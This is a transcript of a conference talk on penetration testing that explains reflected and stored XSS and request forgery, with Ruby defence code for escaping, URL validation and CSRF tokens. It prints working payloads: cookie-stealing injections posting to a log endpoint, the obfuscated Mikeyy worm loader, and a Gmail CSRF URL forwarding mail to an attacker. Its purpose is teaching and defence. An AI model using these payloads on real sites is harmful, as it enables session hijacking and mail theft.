VodQA3_PenetrationTesting_AmitDhakkad

Post on 28-Nov-2014


Description: This was a full-length talk presented by Amit Dhakkad at vodQA-3, a QA meet held at ThoughtWorks, Pune.

Transcript of VodQA3_PenetrationTesting_AmitDhakkad

AMIT DHAKAD

Application Developer

Is considered a “survivor”

Likes To Read About Black Magic & Illusions

What, why and how's of Penetration Testing

- Amit Dhakad, Developer

What do I plan to cover?

What is Penetration Testing?

XSS
- What is it?
- Types of XSS: Reflective XSS, Stored XSS

Request Forgery
- What is it?
- Types of Request Forgery: On-site request forgery, Cross-site request forgery

Demo Attack mechanisms

Real world examples

Why do we need to pay attention?

Penetration Testing: Simulating a malicious attack on a system

Cross-site scripting (XSS): Injecting JavaScript through user-controllable fields

Reflective XSS: Injecting JavaScript using URL parameters

Diagram courtesy : The Web Application Hacker’s Handbook

Attack:

http://localhost:3000/pure-reflective-xss?query=title"onclick="window.location.href=('http://localhost:3000/log?message='%2Bdocument.cookie)

Stored XSS: Exploiting the server's ability to persist

Diagram courtesy : The Web Application Hacker’s Handbook

Attack:

Image url is set to

http://www.myflorida.org.uk/images/disney_gif/Donald.gif"onmouseover="window.location.href=('http://localhost:3000/log?message='+document.cookie)
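Both payloads above work the same way: a user-supplied value is dropped into an HTML attribute unescaped, and the embedded quote closes that attribute so the rest of the value becomes an event-handler attribute. The defence is the same for the reflected query parameter and the stored image URL: encode for the HTML attribute context, and for a URL additionally validate that it is an http(s) URL before emitting it. The Ruby below is an added illustration, not code from the talk or its demo app; the two constant strings are copies of the slide payloads, `render_vulnerable` mirrors the unescaped interpolation the demo presumably did, and the rendering helpers and the crude `event_handlers` check are assumptions made for the example.

```ruby
require 'erb'
require 'uri'

# Untrusted values copied from the two slides (constructed copies; everything
# after the first quote is the attacker-controlled part that breaks out).
REFLECTED_QUERY = %q{title"onclick="window.location.href=('http://localhost:3000/log?message='+document.cookie)}
STORED_IMAGE_URL = %q{http://www.myflorida.org.uk/images/disney_gif/Donald.gif"onmouseover="window.location.href=('http://localhost:3000/log?message='+document.cookie)}

# Vulnerable rendering (assumed to mirror the demo app): raw interpolation into
# an attribute. The quote in the value ends the attribute and the browser reads
# onclick=... as a second attribute, exactly the break-out the slide shows.
def render_vulnerable(value)
  %(<input type="text" name="query" value="#{value}">)
end

# Hardened rendering: escape for the attribute context. ERB::Util.html_escape
# turns " into &quot; and < into &lt;, so the browser sees one attribute whose
# value merely contains a quote character, never a new attribute.
def render_escaped(value)
  %(<input type="text" name="query" value="#{ERB::Util.html_escape(value)}">)
end

# A stored image URL needs validation as well as escaping: the value must be a
# URL the application is willing to emit at all. Only http(s) with a host is
# accepted; quotes, angle brackets and whitespace are never part of a valid URL.
def safe_image_url(value)
  return nil if value =~ /["'<>\s`]/
  uri = URI.parse(value)
  return nil unless uri.is_a?(URI::HTTP) && uri.host # URI::HTTPS is a subclass of URI::HTTP
  uri.to_s
rescue URI::InvalidURIError
  nil
end

# Emit the image tag; anything that fails validation falls back to a placeholder.
def render_image(value)
  url = safe_image_url(value)
  return '<img src="/images/placeholder.gif">' if url.nil?
  %(<img src="#{ERB::Util.html_escape(url)}">)
end

# Crude stand-in for the browser's attribute tokenizer: list every on* attribute
# name that follows a quote or whitespace. Any hit means the untrusted value
# escaped its attribute; an escaped value yields none.
def event_handlers(html)
  html.scan(/(?:^|[\s"'])(on\w+)=/i).flatten
end
```

The `event_handlers` check is deliberately naive (a real browser's parser is the only authority on what an attribute is), but it is enough to show the difference: the vulnerable rendering of the reflected payload carries an `onclick` handler, the escaped rendering carries none, and the stored payload never reaches an `img` tag because it is not a valid URL.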

Request Forgery: Performing unwitting actions on behalf of the user

On-site Request Forgery (OSRF): From the same domain

Attack with XSS:

Image url is set to

http://www.myflorida.org.uk/images/disney_gif/Donald.gif“ onmouseover="var form=document.getElementById('new_bid'); form.bid_amount.value=100;form.submit();

Attack without XSS:

Image url is set to

/bids?bid[amount]=500&bid[auction_id]=1

Cross-site Request Forgery (CSRF): From a different domain

Same origin policy: A page residing on one domain can cause an arbitrary request to be made to another domain, but it cannot itself process the data returned from that request.

A page residing on one domain can load a script from another domain and execute this within its own context.
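The same-origin policy explains why forged requests still work: the attacker's page does not need to read the response, it only needs the browser to send the request with the victim's cookies. The server-side checks that stop the `/bids?bid[amount]=500` image-URL trick and a cross-domain form post are the same three: refuse to change state on GET, check the browser-supplied Origin (or Referer) against the site's own origin, and require a per-session synchronizer token in the form. The Ruby below is an added example, not code from the talk or its demo app; it assumes the demo auction app lives at http://localhost:3000 and, like Rails, names the token parameter `authenticity_token`. The `Request` struct is a stand-in for a real request object.

```ruby
require 'securerandom'

SITE_ORIGIN = 'http://localhost:3000' # origin of the demo auction app (assumed)

# Minimal stand-in for an HTTP request: only the fields the checks below need.
Request = Struct.new(:method, :path, :headers, :params, :session, keyword_init: true)

# Constant-time comparison so a token check does not leak information by timing.
def secure_equal?(a, b)
  return false if a.nil? || b.nil? || a.bytesize != b.bytesize
  a.bytes.zip(b.bytes).reduce(0) { |acc, (x, y)| acc | (x ^ y) }.zero?
end

# Issue a per-session synchronizer token; the bid form embeds it as a hidden field.
def issue_csrf_token(session)
  session[:csrf_token] ||= SecureRandom.hex(32)
end

# Decide whether a state-changing request (placing a bid) may proceed.
# Returns [allowed, reason] so the caller can log why a request was refused.
def authorize_state_change(request)
  # 1. Never mutate state on GET: an <img src="/bids?..."> can only issue GETs,
  #    so the "attack without XSS" from the slide never reaches the bid logic.
  return [false, 'state change must use POST'] unless request.method == 'POST'

  # 2. If the browser sent Origin (or, failing that, Referer), it must be our site.
  #    A form hosted on another domain carries that domain here.
  origin = request.headers['Origin'] ||
           request.headers['Referer']&.sub(%r{\A(https?://[^/]+).*}, '\1')
  return [false, "cross-site origin #{origin.inspect}"] if origin && origin != SITE_ORIGIN

  # 3. The token in the submitted form must match the one stored in the session.
  #    A third-party page cannot read our page, so it cannot learn the token.
  expected = request.session[:csrf_token]
  supplied = request.params['authenticity_token']
  return [false, 'missing or mismatched CSRF token'] unless secure_equal?(expected, supplied)

  [true, 'ok']
end
```

One caveat worth keeping in mind: the token only helps against requests forged from another origin. The slide's "attack with XSS" submits the site's own `new_bid` form, which already carries a valid token, so OSRF driven by injected script is fixed by removing the XSS (output encoding), not by the CSRF check.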

What can you do with XSS and Request Forgery?

Session hijacking

Performing arbitrary actions

Disclosure of user data

Real world attacks

MySpace worm by Samy (XSS + OSRF)

Bypassed all filters and added a script to his profile

The script did two things:
- Added the visiting user as a friend
- Copied itself into the visiting user's profile

Anyone visiting the newly infected user also got added as Samy's friend.

Protection: MySpace strips out the word "onreadystatechange", which is necessary for XML-HTTP requests

Attack: eval('xmlhttp.onread' + 'ystatechange = callback');

Ebay – discovered by Dave Armstrong (OSRF)

Crafted url set as image url

Arbitrary bid was placed on behalf of the visiting user

Mikeyy twitter worm (XSS + OSRF)

Implemented by a 17-year-old boy

"><title><script>document.write(String.fromCharCode(60,115,99,114,105,112,116,32,115,114,99,61,34,104,116,116,112,58,47,47,119,119,119,46,115,116,97,108,107,100,97,105,108,121,46,99,111,109,47,97,106,97,120,46,106,115,34,62,60,47,115,99,114,105,112,116,62));</script>

-- "<script src="http://www.stalkdaily.com/ajax.js"></script>"

Visiting user got infected

Infected users began tweeting unwittingly.

Gmail vulnerability – discovered by Petko Petkov (CSRF)

http://www.gnucitizen.org/util/csrf?_method=POST&_enctype=multipart/form-data&_action=https%3A//mail.google.com/mail/h/ewt1jmuj4ddv/%3Fv%3Dprf&cf2_emc=true&cf2_email=evilinbox@mailinator.com&cf1_from&cf1_to&cf1_subj&cf1_has&cf1_hasnot&cf1_attach=true&tfi&s=z&irf=on&nvp_bu_cftb=Create%20Filter

Adds a filter that forwards all emails to the attacker's email address

Why do we need to pay attention?

Shift is towards attacking clients

Technologies don’t provide strong protection

Considered lame attacks

Identification using automated tools is difficult

Penetration testing is considered a separate vertical

Break your own walls before anyone else does it

Q & A

Thank you